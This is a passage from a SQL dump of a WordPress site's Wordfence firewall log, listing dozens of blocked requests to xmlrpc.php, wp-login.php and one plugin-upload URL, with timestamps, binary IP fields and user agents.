Wordfence Security Network',NULL),(11652,0.000000,1631044204.641728,'\0\0\0\0\0\0\0\0\0\0��4�w%',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11653,0.000000,1631044209.800744,'\0\0\0\0\0\0\0\0\0\0��6%',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11654,0.000000,1631044798.924463,'\0\0\0\0\0\0\0\0\0\0��.ePS',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11655,0.000000,1631045425.821547,'\0\0\0\0\0\0\0\0\0\0��e%�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11656,0.000000,1631046064.623530,'\0\0\0\0\0\0\0\0\0\0��/���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11657,0.000000,1631046072.840593,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11658,0.000000,1631046419.646206,'\0\0\0\0\0\0\0\0\0\0��R�20',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11659,0.000000,1631046675.527073,'\0\0\0\0\0\0\0\0\0\0��g�k',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11660,0.000000,1631046700.104066,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11661,0.000000,1631047334.152957,'\0\0\0\0\0\0\0\0\0\0���&V',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11662,0.000000,1631047335.930678,'\0\0\0\0\0\0\0\0\0\0���5�i',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11663,0.000000,1631047968.612171,'\0\0\0\0\0\0\0\0\0\0���8\Z�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11664,0.000000,1631047977.507966,'\0\0\0\0\0\0\0\0\0\0��\rQ(',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11665,0.000000,1631048621.220053,'\0\0\0\0\0\0\0\0\0\0��l�7�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11666,0.000000,1631048627.087794,'\0\0\0\0\0\0\0\0\0\0��\"@�f',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11667,0.000000,1631049265.501475,'\0\0\0\0\0\0\0\0\0\0���ђ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11668,0.000000,1631049267.960759,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11669,0.000000,1631049912.900485,'\0\0\0\0\0\0\0\0\0\0���#j�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11670,0.000000,1631049913.053447,'\0\0\0\0\0\0\0\0\0\0��$\\',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11671,0.000000,1631050559.253221,'\0\0\0\0\0\0\0\0\0\0���,�1',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11672,0.000000,1631050584.732004,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11673,0.000000,1631051242.668209,'\0\0\0\0\0\0\0\0\0\0��E��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11674,0.000000,1631051251.789769,'\0\0\0\0\0\0\0\0\0\0���a��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11675,0.000000,1631051916.642846,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11676,0.000000,1631051924.989628,'\0\0\0\0\0\0\0\0\0\0��>�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11677,0.000000,1631052233.898986,'\0\0\0\0\0\0\0\0\0\0���Q��',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11678,0.000000,1631052561.039351,'\0\0\0\0\0\0\0\0\0\0�����9',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11679,0.000000,1631052578.965717,'\0\0\0\0\0\0\0\0\0\0����K�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11680,0.000000,1631053236.216634,'\0\0\0\0\0\0\0\0\0\0��[���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11681,0.000000,1631053252.989542,'\0\0\0\0\0\0\0\0\0\0��$\\',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11682,0.000000,1631053944.335366,'\0\0\0\0\0\0\0\0\0\0��@Z(d',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11683,0.000000,1631054623.010679,'\0\0\0\0\0\0\0\0\0\0��#Ɖ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11684,0.000000,1631055336.666554,'\0\0\0\0\0\0\0\0\0\0����I�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11685,0.000000,1631055979.461278,'\0\0\0\0\0\0\0\0\0\0��e%�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11686,0.000000,1631055987.891792,'\0\0\0\0\0\0\0\0\0\0��w`�;',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11687,0.000000,1631056669.046917,'\0\0\0\0\0\0\0\0\0\0����}�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11688,0.000000,1631056688.492463,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11689,0.000000,1631057394.369008,'\0\0\0\0\0\0\0\0\0\0���ф',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11690,0.000000,1631057408.370029,'\0\0\0\0\0\0\0\0\0\0��]qo\"',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11691,0.000000,1631058081.649508,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11692,0.000000,1631058099.505997,'\0\0\0\0\0\0\0\0\0\0��k�g�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11693,0.000000,1631058784.352440,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11694,0.000000,1631058789.028997,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11695,0.000000,1631059481.877856,'\0\0\0\0\0\0\0\0\0\0����F',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11696,0.000000,1631059490.379001,'\0\0\0\0\0\0\0\0\0\0��QDD�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11697,0.000000,1631060207.214678,'\0\0\0\0\0\0\0\0\0\0��)]R',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11698,0.000000,1631060214.232111,'\0\0\0\0\0\0\0\0\0\0���?%',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11699,0.000000,1631060918.011411,'\0\0\0\0\0\0\0\0\0\0����z�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11700,0.000000,1631060931.737561,'\0\0\0\0\0\0\0\0\0\0��/���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11701,0.000000,1631061619.218170,'\0\0\0\0\0\0\0\0\0\0��-wS�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11702,0.000000,1631061651.870574,'\0\0\0\0\0\0\0\0\0\0��3�]',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11703,0.000000,1631062371.602897,'\0\0\0\0\0\0\0\0\0\0��4�w%',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11704,0.000000,1631062374.985041,'\0\0\0\0\0\0\0\0\0\0��3�8�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11705,0.000000,1631063111.240426,'\0\0\0\0\0\0\0\0\0\0���}z/',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11706,0.000000,1631063113.405914,'\0\0\0\0\0\0\0\0\0\0��k��\n',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11707,0.000000,1631063853.736427,'\0\0\0\0\0\0\0\0\0\0����2',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11708,0.000000,1631063875.485303,'\0\0\0\0\0\0\0\0\0\0��g3gI',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11709,0.000000,1631065404.563882,'\0\0\0\0\0\0\0\0\0\0���c]�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11710,0.000000,1631065428.293877,'\0\0\0\0\0\0\0\0\0\0���_nq',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11711,0.000000,1631066185.654587,'\0\0\0\0\0\0\0\0\0\0���ً',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11712,0.000000,1631066195.831495,'\0\0\0\0\0\0\0\0\0\0��3�]',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11713,0.000000,1631066977.529002,'\0\0\0\0\0\0\0\0\0\0��E���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11714,0.000000,1631067786.915010,'\0\0\0\0\0\0\0\0\0\0��k��\n',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11715,0.000000,1631067779.685174,'\0\0\0\0\0\0\0\0\0\0��gm',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11716,0.000000,1631068566.236451,'\0\0\0\0\0\0\0\0\0\0���}z/',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11717,0.000000,1631068568.856481,'\0\0\0\0\0\0\0\0\0\0���Y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11718,0.000000,1631069185.190523,'\0\0\0\0\0\0\0\0\0\0����3�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11719,0.000000,1631069213.526774,'\0\0\0\0\0\0\0\0\0\0��3[{�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11720,0.000000,1631069769.944646,'\0\0\0\0\0\0\0\0\0\0����!p',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11721,0.000000,1631069780.579737,'\0\0\0\0\0\0\0\0\0\0���Q`',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11722,0.000000,1631070262.340436,'\0\0\0\0\0\0\0\0\0\0���c�9',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11723,0.000000,1631070291.075451,'\0\0\0\0\0\0\0\0\0\0����&�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11724,0.000000,1631070738.851851,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11725,0.000000,1631071172.283476,'\0\0\0\0\0\0\0\0\0\0���c\rZ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11726,0.000000,1631071178.039327,'\0\0\0\0\0\0\0\0\0\0��-wT�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11727,0.000000,1631071643.534543,'\0\0\0\0\0\0\0\0\0\0���Aێ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11728,0.000000,1631071654.150329,'\0\0\0\0\0\0\0\0\0\0��H�)�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11729,0.000000,1631072103.360236,'\0\0\0\0\0\0\0\0\0\0��%�[',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11730,0.000000,1631072110.922606,'\0\0\0\0\0\0\0\0\0\0��-�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11731,0.000000,1631072546.990274,'\0\0\0\0\0\0\0\0\0\0��-7<n',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11732,0.000000,1631072560.005040,'\0\0\0\0\0\0\0\0\0\0���}z/',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11733,0.000000,1631073012.498632,'\0\0\0\0\0\0\0\0\0\0��N�Q�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11734,0.000000,1631073013.902966,'\0\0\0\0\0\0\0\0\0\0���8\Z�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11735,0.000000,1631073436.208956,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11736,0.000000,1631073473.126171,'\0\0\0\0\0\0\0\0\0\0��\\̆�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11737,0.000000,1631073887.873919,'\0\0\0\0\0\0\0\0\0\0��\"{3',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11738,0.000000,1631073909.649580,'\0\0\0\0\0\0\0\0\0\0����Dy',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11739,0.000000,1631074367.096743,'\0\0\0\0\0\0\0\0\0\0����*J',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11740,0.000000,1631074376.280124,'\0\0\0\0\0\0\0\0\0\0��3D(',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11741,0.000000,1631074801.063253,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11742,1631074802.485341,1631074802.388400,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11743,0.000000,1631074817.614803,'\0\0\0\0\0\0\0\0\0\0��E��|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11744,0.000000,1631075262.317785,'\0\0\0\0\0\0\0\0\0\0����E�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11745,0.000000,1631075275.343065,'\0\0\0\0\0\0\0\0\0\0���Q`',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 